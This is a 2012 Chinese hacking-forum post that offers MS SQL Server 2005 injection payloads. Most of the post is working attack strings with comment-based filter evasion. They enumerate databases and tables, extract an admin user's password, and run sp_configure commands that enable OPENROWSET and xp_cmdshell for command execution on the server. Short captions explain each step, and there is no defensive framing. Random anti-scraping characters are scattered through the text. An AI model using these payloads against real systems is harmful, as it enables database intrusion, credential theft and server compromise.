找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2347|回复: 0
打印 上一主题 下一主题

MSsql2005注入语句

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:19:47 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
8 w* t7 ~; z  c

" {/ N8 ]  G2 Q
$ _8 E4 e0 {. V[Copy to clipboard]CODE:" g; D% o; e  |( j: V7 G
/**/and/**/(select/**/top/**/1/**/isnull(cast([name]/**/as/**/nvarchar(500)),char(32))%2bchar(124)/**/from/**/[master].[dbo].[sysdatabases]/**/where/**/dbid/**/in/**/(select/**/top/**/1/**/dbid/**/from/**/[master].[dbo].[sysdatabases]/**/order/**/by/**/dbid/**/desc))%3d0--
; Z' k4 ]& b" R8 c/ m
2 k* T" o; p2 ^% D5 V7 R& ^爆表语句,somedb部份是所要列的数据库,红色数字1累加
$ {  }1 ?) n/ p/ u. q( \1 V* i2 s2 V* w$ o

2 `% f7 O% O/ P: n3 X: h+ c' D[Copy to clipboard]CODE:
! T; Q/ L2 d0 }9 F/**/and/**/(select/**/top/**/1/**/cast(name/**/as/**/varchar(200))/**/from/**/(select/**/top/**/1/**/name/**/from/**/somedb.sys.all_objects/**/where/**/type%3dchar(85)/**/order/**/by/**/name)/**/t/**/order/**/by/**/name/**/desc)%3d0--% S1 m8 W2 W2 k- G0 j

+ u7 w% k) D# P; F0 p* L, l爆字段语句,爆表admin里user='icerover'的密码段
" D  s  M! A# ]) m! S  x
1 N, `2 A5 m7 j1 _& z8 J
6 L8 [, {. x7 }4 g, i. g- r+ h9 y[Copy to clipboard]CODE:
5 U( B4 |- ?; V; _# Y4 N**/And/**/(Select/**/Top/**/1/**/isNull(cast([password]/**/as/**/varchar(2000)),char(32))%2bchar(124)/**/From/**/(Select/**/Top/**/1/**/[password]/**/From/**/[somedb]..[admin]/**/Where/**/user='icerover'/**/Order/**/by/**/[password])/**/T/**/Order/**/by/**/[password]Desc)%3d0--
8 N; D' X* V* K! y  n( e
+ H2 g8 n  @" b7 lmssql2005默认没有开xp_cmdshell的,openrowset也不能用
- E" }) Z1 L" G" L如果是sa权限,可以这样来开启, s4 B5 I! G0 \/ t2 i! `# j+ D
开启openrowset
! h- h) X6 }/ s5 E  f
+ o5 A( D, Y0 i. l. G. W, W% m) j$ j  j# v4 L; w
[Copy to clipboard]CODE:
- K3 [/ J  A6 Z$ L- ^/**/sp_configure/**/'show/**/advanced/**/options',/**/1;RECONFIGURE;--
* r- Z4 s$ t. t( u! p7 `2 z- _/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',/**/1;RECONFIGURE;--
2 R, t/ X* R) r2 s* [: F% u$ _% A4 c) L
4 r5 [0 v+ a; @5 q7 z开启xp_cmdshell: K7 [9 ?# B8 S( j- c

4 G; ^% H3 L& A4 }, B
5 ^7 U! G) M0 T  ^* Q9 R7 R[Copy to clipboard]CODE:
" q* a( b  W2 x- V/ HEXEC/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',1;RECONFIGURE;--' O1 g$ w# X1 F0 a" |" M7 [: y7 r& N
EXEC/**/sp_configure/**/'show/**/advanced/**/options',1;RECONFIGURE;EXEC/**/sp_configure/**/'xp_cmdshell',1;RECONFIGURE;--4 w2 N5 {4 V2 G9 _( j
& u! d* J: A# k4 z8 s2 }
ok,over~~晚安
+ L( r+ Q* X) v
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表